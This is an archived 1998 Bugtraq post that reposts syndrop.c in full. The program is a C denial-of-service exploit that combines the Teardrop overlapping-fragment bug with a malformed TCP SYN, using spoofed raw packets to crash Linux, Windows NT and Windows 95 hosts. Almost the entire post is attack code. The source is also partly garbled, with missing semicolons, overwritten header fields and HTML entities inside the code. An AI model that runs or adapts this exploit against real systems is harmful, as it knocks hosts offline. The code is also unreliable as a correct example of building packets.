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DOS: Teardrop mixed with a SYN - syndrop.c


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X-RDate: Fri, 03 Apr 1998 08:26:17 +0600 (ESD)
Date: Thu, 2 Apr 1998 15:46:36 GMT
From: bluefish@swipnet.se
To: BUGTRAQ@NETSPACE.ORG
Subject: DOS: Teardrop mixed with a SYN - syndrop.c

Found this in the alt.2600 ng...

/*  syndrop.c
 *  by PineKoan
 *  stomp on M$ SYN sequence bug and the teardrop frag fuckup at same time!
 *  tcp instead of udp
 *
 *  based on: Newtear.c
 *  which was: Copyright (c) 1997 route|daemon9  <route@infonexus.com>
11.3.97
 *  Linux/NT/95 Overlap frag bug exploit
 *  which was: Based off of:   flip.c by klepto
 *
 *  Compiles on:    Linux, *BSD*
 *  gcc -O2 teardrop.c -o teardrop
 *      OR
 *  gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>

#ifdef STRANGE_BSD_BYTE_ORDERING_THING
                        /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0
*/
#define FIX(n)  (n)
#else                   /* OpenBSD 2.1, all Linux */
#define FIX(n)  htons(n)
#endif  /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF   0x2000  /* More IP fragment en route */
#define IPH     0x14    /* IP header size */
#define UDPH    0x8     /* UDP header size */
#define TCPH    sizeof(struct tcphdr)   /* TCP header */
#define PADDING 0x14    /* datagram frame padding for first packet */ /* JD
Chan
ge pad size to 20 decimal. */
#define MAGIC   0x3     /* Magic Fragment Constant (tm).  Should be 2 or 3 */
#define COUNT   0x11     /* Linux dies with 1, NT is more stalwart and can
                         * withstand maybe 5 or 10 sometimes...  Experiment.
                         * syndrop: gotta hit it at least 8 times.
overflowing
                         * some static sized buffer.  fools.
                         */
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short, u_long, u_long);

int main(int argc, char **argv)
{
    int one = 1, count = 0, i, rip_sock;
    u_long  src_ip = 0, dst_ip = 0;
    u_short src_prt = 0, dst_prt = 0;
    u_long s_start = 0, s_end = 0;
    struct in_addr addr;

    fprintf(stderr, "syndrop by PineKoan\n");

    if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
        perror("raw socket");
        exit(1);
    }
    if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one,
sizeof(one))
        < 0)
    {
        perror("IP_HDRINCL");
        exit(1);
    }
    if (argc < 3) usage(argv[0]);
    if (!(src_ip = name_resolve(argv[1])) || !(dst_ip =
name_resolve(argv[2])))
    {
        fprintf(stderr, "What the hell kind of IP address is that?\n");
        exit(1);
    }

    while ((i = getopt(argc, argv, "s:t:n:S:E:")) != EOF)
    {
        switch (i)
        {
            case 's':               /* source port (should be emphemeral) */
                src_prt = (u_short)atoi(optarg);
                break;
            case 't':               /* dest port (DNS, anyone?) */
                dst_prt = (u_short)atoi(optarg);
                break;
            case 'n':               /* number to send */
                count   = atoi(optarg);
                break;
            case 'S':               /* SYN sequence start */
                s_start   = atoi(optarg);
                break;
            case 'E':               /* SYN sequence end */
                s_end   = atoi(optarg);
                break;
            default :
                usage(argv[0]);
                break;              /* NOTREACHED */
        }
    }
    srandom((unsigned)(time((time_t)0)));
    if (!src_prt) src_prt = (random() % 0xffff);
    if (!dst_prt) dst_prt = (random() % 0xffff);
    if (!count)   count   = COUNT;

    fprintf(stderr, "Death on flaxen wings:\n");
    addr.s_addr = src_ip;
    fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
    addr.s_addr = dst_ip;
    fprintf(stderr, "  To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
    fprintf(stderr, " Amt: %5d\n", count);
    fprintf(stderr, "[ ");
    for (i = 0; i < count; i++)
    {
        send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt, s_start,
s_end);
        fprintf(stderr, "b00m ");
        usleep(500);
    }
    fprintf(stderr, "]\n");
    return (0);
}

/*
 *  Send two IP fragments with pathological offsets.  We use an
implementation
 *  independent way of assembling network packets that does not rely on any
of
 *  the diverse O/S specific nomenclature hinderances (well, linux vs. BSD).
 */
void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
                u_short dst_prt, u_long seq1, u_long seq2)
{
    u_char *packet = NULL, *p_ptr = NULL;   /* packet pointers */
    u_char byte;                            /* a byte */
    struct sockaddr_in sin;                 /* socket protocol structure */

    sin.sin_family      = AF_INET;
    sin.sin_port        = src_prt;
    sin.sin_addr.s_addr = dst_ip;

    /*
     * Grab some memory for our packet, align p_ptr to point at the beginning
     * of our packet, and then fill it with zeros.
     */
    packet = (u_char *)malloc(IPH + UDPH + PADDING);
    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING); // Set it all to zero

    byte = 0x45;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) |= FIX(IP_MF);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_TCP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);       /* TCP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* TCP destination port */
    p_ptr += 2;
    *((u_long *)p_ptr) = seq1;          /* TCP sequence # */
    p_ptr += 4;
    *((u_long *)p_ptr) = 0;             /* ack */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(8 + PADDING*2);   /* TCP data offset */ /*
Incre
ases TCP total length to 48 bytes Which is too big! */
    p_ptr += 2;
    *((u_char *)p_ptr) = TH_SYN;        /* flags: mark SYN */
    p_ptr += 1;
    *((u_short *)p_ptr) = seq2-seq1;    /* window */
    *((u_short *)p_ptr) = 0x44          /* checksum : this is magic value for
NT
, W95.  dissasemble M$ C++ to see why, if you have time  */
    *((u_short *)p_ptr) = 0;            /* urgent */

    if (sendto(sock, packet, IPH + TCPH + PADDING, 0, (struct sockaddr
*)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    /*  We set the fragment offset to be inside of the previous packet's
     *  payload (it overlaps inside the previous packet) but do not include
     *  enough payload to cover complete the datagram.  Just the header will
     *  do, but to crash NT/95 machines, a bit larger of packet seems to work
     *  better.
     */
    p_ptr = &packet[2];         /* IP total length is 2 bytes into the header
*/
    *((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
    p_ptr += 4;                 /* IP offset is 6 bytes into the header */
    *((u_short *)p_ptr) = FIX(MAGIC);
    p_ptr = &packet[24];        /* hop in to the sequence again... */
    *((u_long *)p_ptr) = seq2;          /* TCP sequence # */

    if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }
    free(packet);
}

u_long name_resolve(u_char *host_name)
{
    struct in_addr addr;
    struct hostent *host_ent;

    if ((addr.s_addr = inet_addr(host_name)) == -1)
    {
        if (!(host_ent = gethostbyname(host_name))) return (0);
        bcopy(host_ent->h_addr, (char *)&amp;addr.s_addr,
host_ent-&gt;h_length)
;
    }
    return (addr.s_addr);
}

void usage(u_char *name)
{
    fprintf(stderr,
            "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]
",
            name);
    fprintf(stderr,
            "[ -S sequence_start] [ -E sequence_end ]\n",
    exit(0);
}





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